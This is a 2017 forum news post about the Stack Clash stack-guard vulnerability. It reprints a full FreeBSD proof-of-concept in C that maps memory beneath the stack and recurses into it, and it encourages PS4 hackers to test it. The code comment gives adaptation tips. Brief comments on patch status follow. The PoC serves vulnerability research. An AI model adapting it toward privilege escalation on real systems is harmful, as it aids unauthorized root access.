Category PS4 CFW and Hacks       Thread starter FabOne       Start date Jun 20, 2017 at 1:30 PM       13,981       26            
Following the recently reported Spread Overflow Exploit WebKit Bugs and PS4 MEMEs, a new massive vulnerability in Linux-Kernel, FreeBSD, OpenBSD, Solaris and Unix-based OSes called "Stack Clash" was rediscovered and can be used to gain root privileges on the affected systems. :geek:

Here are some related links with details on the Stack Clash bug:
According to PS4 developers it's currently untested on the PlayStation 4, so if anyone gives it a try let us know your results in this ongoing discussion thread.
Download: 001-stackclash.c
Code:
/*-
 * Copyright (c) 2017 Shawn Webb <[email protected]>
 * All rights reserved.
 *
 * Redistribution and use in source and binary forms, with or without
 * modification, are permitted provided that the following conditions
 * are met:
 * 1. Redistributions of source code must retain the above
 *    copyright notice, this list of conditions and the following
 *    disclaimer.
 * 2. Redistributions in binary form must reproduce the above
 *    copyright notice, this list of conditions and the following
 *    disclaimer in the documentation and/or other materials
 *    provided with the distribution.
 * 3. The name of the author may not be used to endorse or promote
 *    products derived from this software without specific prior
 *    written permission.
 *
 * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND
 * CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES,
 * INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF
 * MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
 * DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR
 * CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
 * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
 * LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF
 * USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED
 * AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
 * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN
 * ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
 * POSSIBILITY OF SUCH DAMAGE.
 *
 * Stack Clash PoC for FreeBSD.
 *
 * Compile: clang -O0 -fPIE -pie -lprocstat -o 001-stackclash 001-stackclash.c
 *
 * Note: If the security.bsd.unprivileged_proc_debug sysctl node is
 * set to 0, then this PoC as it's written requires root privileges.
 * Since FreeBSD lacks ASLR, you can simply gut out the libprocstat
 * integration and hardcode the stack address (be sure to use the
 * macros to round down to the bottom of the page). There are other
 * tricks you can do to find the stack address. Do what suits you
 * best.
 */

#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <unistd.h>

#include <sys/types.h>
#include <sys/param.h>
#include <sys/queue.h>
#include <sys/user.h>
#include <sys/sysctl.h>
#include <sys/mman.h>
#include <libprocstat.h>

unsigned char *
func(void)
{
	unsigned char buf[16];
	int i;

	for (i=0; i < sizeof(buf)-1; i++)
		if (buf[i] == 0x41 && buf[i+1] == 0x41)
			return (buf+i);

	return func();
}

int
main(int argc, char *argv[])
{
	struct procstat *ps;
	struct kinfo_proc *p;
	struct kinfo_vmentry *vm;
	unsigned int i, cnt;
	void *stack_start, *stack_end;
	unsigned char *map, *found;

	stack_start = stack_end = NULL;

	cnt = 0;

	ps = procstat_open_sysctl();
	if (ps == NULL) {
		perror("procstat_open_sysctl");
		return (1);
	}

	p = procstat_getprocs(ps, KERN_PROC_PID, getpid(), &cnt);
	if (cnt == 0) {
		perror("procstat_getprocs");
		return (1);
	}

	cnt = 0;
	vm = procstat_getvmmap(ps, p, &cnt);
	if (cnt == 0) {
		perror("procstat_getvmmap");
		return (1);
	}

	for (i=0; i<cnt; i++) {
		if (vm[i].kve_flags & KVME_FLAG_GROWS_DOWN) {
			stack_start = (void *)vm[i].kve_start;
			stack_end = (void *)vm[i].kve_end;
		}
	}

	if (stack_start == NULL)
		return (1);

	map = mmap(stack_start - (PAGE_SIZE * 2), PAGE_SIZE,
	    PROT_READ | PROT_WRITE, MAP_FIXED | MAP_SHARED
	    | MAP_ANON, -1, 0);

	if (map == (void *)MAP_FAILED) {
		perror("mmap");
		return (1);
	}

	printf("Mapping is at 0x%016lx\n", (unsigned long)map);
	printf("Stack start is at 0x%016lx\n", (unsigned long)stack_start);

	for (i=0; i < PAGE_SIZE; i++)
		map[i] = 0x41;

	found = func();
	if (found != NULL)
		printf("Found 0x41 at %p\n", found);

	return (0);
}
Thanks to @kazookid0 and @X41 for the heads-up in the PSXHAX Shoutbox on this news last night! :thumbup:
Stack Clash Vulnerability in Linux, FreeBSD, OpenBSD & Unix OSes.jpg
 

Comments

gregdaleg

Senior Member
Contributor
useless... because its already patched on new version
They still wont release anything. Its not about waiting for an exploit to be patched before they release. Its about not letting a kernel exploit get into the hands of the public. It seems that's no longer sony's job anymore.
 

P3T3s

Senior Member
Contributor
Even if this is useful for PS4 nothing will be released to the general public.
That all depends on if and who gets this working!
useless... because its already patched on new version
Its may or may not be patched as on wololo its saying patch some issue with FFXIV Stormblood so may have been system, if its not patch and exploitable it will be patched on next FW update.
 
Recent Articles
Red Dead Online Recreation in Dreams on PS4 by Rikkiscafe
We've seen a MGS HD Remake, a FFVII Dreamake, some RDR2 Mods and the latest Red Dead Online PS4 creation in Dreams by Media Molecule comes from Rikkiscafe via iferraz2. 🤠 For those who haven't...
Hunt: Showdown Brings Bounty Hunters to PlayStation 4 Next Week
Next week join the rugged bounty hunters of Hunt: Showdown as they rid the world from the savage, nightmarish monsters roaming the Louisiana swamps! :eek: Hunt's competitive, match-based gameplay...
Rainbow Six Siege: Operation Void Edge PS4 Updates and Reveal Trailer
Following the Tom Clancy's Rainbow Six Siege Operation Blood Orchid PS4 Trailer and Operation White Noise updates this weekend Ubisoft outlined the new Rainbow Six Siege: Operation Void Edge...
Mortal Kombat 11 DeepFake Celebrity Skin Demos by BabyZone
Game modder BabyZone recently shared some Mortal Kombat 11 DeepFake skin demos featuring popular celebrities including Keanu Reeves, Bruce Lee, Bruce Campbell, The Rock, Vandamme and Jackie Chan...
Top